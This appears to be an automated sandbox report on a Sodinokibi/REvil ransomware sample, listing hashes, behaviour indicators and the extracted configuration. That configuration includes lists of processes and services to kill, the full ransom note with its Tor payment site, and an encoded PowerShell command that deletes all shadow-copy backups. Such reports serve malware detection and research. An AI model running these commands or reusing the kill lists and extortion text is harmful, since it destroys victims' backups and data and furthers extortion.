sodinokibi | 740ad8ea62f10de39e0b794cf6f579f25af1b8d79f859b48ecd41edc1f92cf13

Analysis

max time kernel
151s
max time network
153s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
02-06-2023 16:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Revil.exe
Size

119KB
MD5

fa8117afd2dbd20513522f2f8e991262
SHA1

f7b876edb8fc0c83fd8b665d3c5a1050d4396302
SHA256

78b592a2710d81fa91235b445f674ee804db39c8cc34f7e894b4e7b7f6eacaff
SHA512

2bab344d136b31cd7c55b7cd0ef1b7718c9952573f3b1478a2efb8211563d7dedacefd4764a7186e15f7de93cc43fa29fc4d2fa61961a14bb12d7bea830e5032
SSDEEP

3072:KW5yc3Y4SMQwuOekD96R928AN+/uSxo+HHz/bs/k4OS:K83Y5BAxa92KrxTnz/Y/k4O

Score

10^/10

sodinokibi $2b$13$wz1rerfdlg.aistldqg5jeqqysemspatwkhdwbpwvrc3ty7akscg6 49 persistence ransomware

Malware Config

Extracted

Family

sodinokibi

Botnet

$2b$13$wz1reRfdLg.aiStLDqg5JeqqySemSPatWKHdwbpWVrC3ty7Akscg6

Campaign

Attributes

net
false
pid
$2b$13$wz1reRfdLg.aiStLDqg5JeqqySemSPatWKHdwbpWVrC3ty7Akscg6
prc
vsnapvss

EnterpriseClient

firefox

infopath

cvd

tv_x64.exe

VeeamTransportSvc

steam

encsvc

mydesktopservice

outlook

synctime

ocssd

SAP

cvfwd

bengien

vxmon

bedbh

ocomm

ocautoupds

raw_agent_svc

oracle

disk+work

powerpnt

saposcol

sqbcoreservice

sapstartsrv

beserver

saphostexec

dbeng50

isqlplussvc

CVODS

DellSystemDetect

CVMountd

TeamViewer.exe

dbsnmp

thunderbird

mspub

wordpad

visio

benetns

QBCFMonitorService

TeamViewer_Service.exe

tv_w32.exe

QBIDPService

winword

thebat

VeeamDeploymentSvc

avagent

QBDBMgrN

mydesktopqos

xfssvccon

sql

tbirdconfig

CagService

pvlsvr

avscc

VeeamNFSSvc

onenote

excel

msaccess

agntsvc
ransom_oneliner
All of your files are encrypted! Find EDGEWATER-README.txt and follow instuctions
ransom_template
---=== Welcome. Again. ===--- [+] What's Happened? [+] Your files have been encrypted and currently unavailable. You can check it. All files in your system have {EXT} extension. By the way, everything is possible to recover (restore) but you should follow our instructions. Otherwise you can NEVER return your data. [+] What are our guarantees? [+] It's just a business and we care only about getting benefits. If we don't meet our obligations, nobody will deal with us. It doesn't hold our interest. So you can check the ability to restore your files. For this purpose you should visit our website where you can decrypt one file for free. That is our guarantee. It doesn't metter for us whether you cooperate with us or not. But if you don't, you'll lose your time and data cause only we have the private key to decrypt your files. In practice - time is much more valuable than money. [+] How to get access to our website? [+] Use TOR browser: 1. Download and install TOR browser from this site: https://torproject.org/ 2. Visit our website: http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion When you visit our website, put the following data into the input form: Key: {KEY} !!! DANGER !!! DON'T try to change files by yourself, DON'T use any third party software or antivirus solutions to restore your data - it may entail the private key damage and as a result all your data loss! !!! !!! !!! ONE MORE TIME: It's in your best interests to get your files back. From our side we (the best specialists in this sphere) ready to make everything for restoring but please do not interfere. !!! !!! !!
sub
49
svc
QBCFMonitorService

thebat

dbeng50

winword

dbsnmp

VeeamTransportSvc

disk+work

TeamViewer_Service.exe

firefox

QBIDPService

steam

onenote

CVMountd

cvd

VeeamDeploymentSvc

VeeamNFSSvc

bedbh

mydesktopqos

avscc

infopath

cvfwd

excel

beserver

powerpnt

mspub

synctime

QBDBMgrN

tv_w32.exe

EnterpriseClient

msaccess

ocssd

mydesktopservice

sqbcoreservice

CVODS

DellSystemDetect

oracle

ocautoupds

wordpad

visio

SAP

bengien

TeamViewer.exe

agntsvc

CagService

avagent

ocomm

outlook

saposcol

xfssvccon

isqlplussvc

pvlsvr

sql

tbirdconfig

vxmon

benetns

tv_x64.exe

encsvc

sapstartsrv

vsnapvss

raw_agent_svc

thunderbird

saphostexec

Extracted

Path

C:\Recovery\EDGEWATER-README.txt

Ransom Note

---=== Welcome. Again. ===--- [+] What's Happened? [+] Your files have been encrypted and currently unavailable. You can check it. All files in your system have 2ag2324 extension. By the way, everything is possible to recover (restore) but you should follow our instructions. Otherwise you can NEVER return your data. [+] What are our guarantees? [+] It's just a business and we care only about getting benefits. If we don't meet our obligations, nobody will deal with us. It doesn't hold our interest. So you can check the ability to restore your files. For this purpose you should visit our website where you can decrypt one file for free. That is our guarantee. It doesn't metter for us whether you cooperate with us or not. But if you don't, you'll lose your time and data cause only we have the private key to decrypt your files. In practice - time is much more valuable than money. [+] How to get access to our website? [+] Use TOR browser: 1. Download and install TOR browser from this site: https://torproject.org/ 2. Visit our website: http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion When you visit our website, put the following data into the input form: Key: F9zjeXm36VHRRg91L8nQr0rHXV6pvhR9Vxy/LZMOYPXf56p+cz5T5EImjVNkT51C QPp8kaIa+CbvHR0sLxTyeb/9JuNRgmnikXOaGSfKrxNaOhpVq0Slr6SZfJUa69dZ cOrypVR5O0XjyAFEgdmg3WyyCSBsen2vMcIjKnz2FkG9mS7oEgdCEZcYq1crNTZT Das1vPTlNr/kRleUb6wksXFwHIPKCRwwLOnufWSJqD9gvDxySa6hkEkAJhH6jFLy lVkRMqhgcZZ8bgBiuXxX1k0aUbA3BJWrHdHJFlkxVTH2y0JwXryitwps15pigKMV fcdOpGHQRaK3rBcEWa4s+UeqppGXwK1kaFiHJkTjAvRo+KHLN/j8GL32AD0poAvo TCbx2BsWJ8zeWcBkVsjbdRVbfahNRxB0cN/4hhlvUnWKEbZEEFGXdVq1oGYQafvU MlYekp8bXZTbmGksBX4+Wz8KIAUC1zISess61i0mYvjQIUOqeGHSp79GhA5Dl19R VWDR9NUP4B0tnlZRtgdDpAz4wlvCu1vVlEEEScIdu4HFZOfh0y7AJhR5jEMV2CRt js67nAv4UC9UYDA1yg2DYsyv0OozKsrzmS7xFJk62a+9diixDY3XdD5hZmDvebAV CS6yzLRevj1cWofDl7Y0o3IDVg0phCOwlMxs3R50aFLhtoEcIpaYB3QRwqr/x9jn q4EpkarYEfnvnrw60Tx852/hXZ2OrZvEG5TQlOQTNOExjxfCxx2svdNbOp0Z9mUv NZdhpKXiVohvVRp4J8XWlUhdGqzwyY9/i3Q/3vjng4JLgB4bYZ8kHY4a+q6Xpnzv Z+AaJr7tNepV77rzXFdbQStJCjruMAo7KiZGilYuF39+n67Fx8i6ZOHGvpUAGYYb uGSAHYbcHQd57RgC1inKaPUMLX0z7zWfYKenHzVkvR8QNsT/LAdwmHSrdg/m83J6 tkdLTffZUo6f1I4G4alLvBYVeTuZb5Bj9Ewv2Wyc5KMkayNxq5yxS3Njw2ZGg9FB DPtNoxSjIsQ0hiKqO/69T3XgjnzKJQw1MK4Hp4OO4sJ9LyTIzQH5ETgNRG+xLxqM 5IBTQwfP9SJ9lwI5kb6BtVt1t1c1m1+ha2toObbvCT1kv6CvAlfVrEQT7aTeRR7o kHrDz+ppLg6R2HmTNkeIusklB6xxcozHYeWcVLluzDfmGNPB3+CMnkZNHj7Mz2Rk IcBH02Cvj+up+vMel8fQhtEsYh5G46+RCwt1l3yppQgqU2YwbeOBAC0xjtKqW14d 1gjv4RnTkdn94LP1NyM= !!! DANGER !!! DON'T try to change files by yourself, DON'T use any third party software or antivirus solutions to restore your data - it may entail the private key damage and as a result all your data loss! !!! !!! !!! ONE MORE TIME: It's in your best interests to get your files back. From our side we (the best specialists in this sphere) ready to make everything for restoring but please do not interfere. !!! !!! !!

URLs

http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
ransomware

Processes:

Revil.exe

description ioc process

File renamed C:\Users\Admin\Pictures\InstallConfirm.crw => \??\c:\users\admin\pictures\InstallConfirm.crw.2ag2324 Revil.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\InstallConfirm.crw => \??\c:\users\admin\pictures\InstallConfirm.crw.2ag2324	Revil.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Revil.exe

description	ioc	process
File opened (read-only)	\??\E:	Revil.exe
File opened (read-only)	\??\G:	Revil.exe
File opened (read-only)	\??\S:	Revil.exe
File opened (read-only)	\??\T:	Revil.exe
File opened (read-only)	\??\D:	Revil.exe
File opened (read-only)	\??\Y:	Revil.exe
File opened (read-only)	\??\F:	Revil.exe
File opened (read-only)	\??\J:	Revil.exe
File opened (read-only)	\??\L:	Revil.exe
File opened (read-only)	\??\O:	Revil.exe
File opened (read-only)	\??\R:	Revil.exe
File opened (read-only)	\??\V:	Revil.exe
File opened (read-only)	\??\Z:	Revil.exe
File opened (read-only)	\??\A:	Revil.exe
File opened (read-only)	\??\K:	Revil.exe
File opened (read-only)	\??\P:	Revil.exe
File opened (read-only)	\??\Q:	Revil.exe
File opened (read-only)	\??\U:	Revil.exe
File opened (read-only)	\??\W:	Revil.exe
File opened (read-only)	\??\B:	Revil.exe
File opened (read-only)	\??\H:	Revil.exe
File opened (read-only)	\??\I:	Revil.exe
File opened (read-only)	\??\M:	Revil.exe
File opened (read-only)	\??\N:	Revil.exe
File opened (read-only)	\??\X:	Revil.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

Revil.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\mf9lpvbu.bmp"	Revil.exe

Drops file in Program Files directory 19 IoCs

Processes:

Revil.exe

description	ioc	process
File opened for modification	\??\c:\program files\OptimizeSwitch.dib	Revil.exe
File opened for modification	\??\c:\program files\ExpandEnter.htm	Revil.exe
File opened for modification	\??\c:\program files\FormatOpen.ods	Revil.exe
File opened for modification	\??\c:\program files\ExitSend.docx	Revil.exe
File opened for modification	\??\c:\program files\UnprotectGet.3gp2	Revil.exe
File opened for modification	\??\c:\program files\WriteSkip.wmx	Revil.exe
File created	\??\c:\program files\EDGEWATER-README.txt	Revil.exe
File created	\??\c:\program files (x86)\EDGEWATER-README.txt	Revil.exe
File opened for modification	\??\c:\program files\JoinConfirm.mp4	Revil.exe
File opened for modification	\??\c:\program files\MeasureSplit.crw	Revil.exe
File opened for modification	\??\c:\program files\MountPing.tiff	Revil.exe
File opened for modification	\??\c:\program files\RestartUnregister.docx	Revil.exe
File opened for modification	\??\c:\program files\UnpublishRead.htm	Revil.exe
File opened for modification	\??\c:\program files\CompressWrite.potm	Revil.exe
File opened for modification	\??\c:\program files\InvokeConvert.xps	Revil.exe
File opened for modification	\??\c:\program files\SplitResolve.vsdx	Revil.exe
File opened for modification	\??\c:\program files\StepReceive.sql	Revil.exe
File opened for modification	\??\c:\program files\AddImport.otf	Revil.exe
File opened for modification	\??\c:\program files\CompareCompress.mp3	Revil.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133301959018730802"	chrome.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

Revil.exepowershell.exechrome.exe

pid process

4144 Revil.exe
4144 Revil.exe
5060 powershell.exe
5060 powershell.exe
5060 powershell.exe
3972 chrome.exe
3972 chrome.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

chrome.exe

pid process

3972 chrome.exe
3972 chrome.exe
3972 chrome.exe
3972 chrome.exe
3972 chrome.exe
3972 chrome.exe
3972 chrome.exe
3972 chrome.exe

pid	process
4144	Revil.exe
4144	Revil.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
3972	chrome.exe
3972	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Revil.exepowershell.exevssvc.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	4144	Revil.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeBackupPrivilege	3936	vssvc.exe
Token: SeRestorePrivilege	3936	vssvc.exe
Token: SeAuditPrivilege	3936	vssvc.exe
Token: SeTakeOwnershipPrivilege	4144	Revil.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe
Token: SeShutdownPrivilege	3972	chrome.exe
Token: SeCreatePagefilePrivilege	3972	chrome.exe

Suspicious use of FindShellTrayWindow 27 IoCs

Processes:

chrome.exe

pid	process
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe
3972	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Revil.exechrome.exe

description	pid	process	target process
PID 4144 wrote to memory of 5060	4144	Revil.exe	powershell.exe
PID 4144 wrote to memory of 5060	4144	Revil.exe	powershell.exe
PID 3972 wrote to memory of 704	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 704	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3964	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3784	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 3784	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe
PID 3972 wrote to memory of 756	3972	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Revil.exe
"C:\Users\Admin\AppData\Local\Temp\Revil.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2036

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3936

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\EDGEWATER-README.txt
1⤵
PID:4996

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\EDGEWATER-README.txt
1⤵
PID:4484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd8ef79758,0x7ffd8ef79768,0x7ffd8ef79778
2⤵
PID:704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1808 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:8
2⤵
PID:3784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1584 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:2
2⤵
PID:3964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2088 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:8
2⤵
PID:756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2956 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:1
2⤵
PID:1768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2968 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:1
2⤵
PID:432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4344 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:1
2⤵
PID:1724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4584 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:8
2⤵
PID:4244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4600 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:8
2⤵
PID:2116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4952 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:8
2⤵
PID:696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:8
2⤵
PID:3128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4940 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:8
2⤵
PID:2832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4872 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:1
2⤵
PID:3280

C:\Program Files\Google\Chrome\Application\chrome.exe
